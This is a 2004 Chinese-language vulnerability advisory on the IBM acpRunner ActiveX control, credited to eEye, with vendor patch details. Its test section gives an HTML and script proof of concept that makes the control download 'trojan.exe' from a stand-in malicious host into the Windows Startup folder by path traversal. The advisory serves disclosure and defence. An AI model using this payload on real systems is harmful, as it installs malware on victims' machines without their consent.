发布日期：2004-06-16
更新日期：2004-06-22

受影响系统：

IBM acpRunner 1.2.5.0

描述：

---

BUGTRAQ  ID: 10561

IBM "acpRunner"控件也是IBM用于自动维护PC的解决方案。

IBM "acpRunner"控件包含危险的调用方法，远程攻击者可以利用这个漏洞在目标用户系统上安装恶意程序。

IBM "acpRunner"控件可调用方法有"DownLoadURL"、"SaveFilePath"和"Download"接收文件名的变量，这些危险的调用可使用户下载恶意文件到用户硬盘中，包括启动文件夹。

利用这些方法，攻击者构建恶意页面，诱使用户点击，可导致恶意程序安装并执行。

<*来源：Eeye Digital Security
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=108745652205176&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Eeye Digital Security 提供了如下测试方法：

-----------EXAMPLE HTML---------

|object width="310" height="20"
codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpC
ontrol.cab" id="runner"
classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIA
AAEQIAAA==">
|object|

|script|
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.FileSize = 96,857;
runner.FileDate = "01/09/2004 3:33";
runner.DownLoad();
|script|

---------------------------------

建议：

---

厂商补丁：

IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

IBM Upgrade access_support_fp2.exe
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-54588

浏览次数：3456
严重程度：0（网友投票）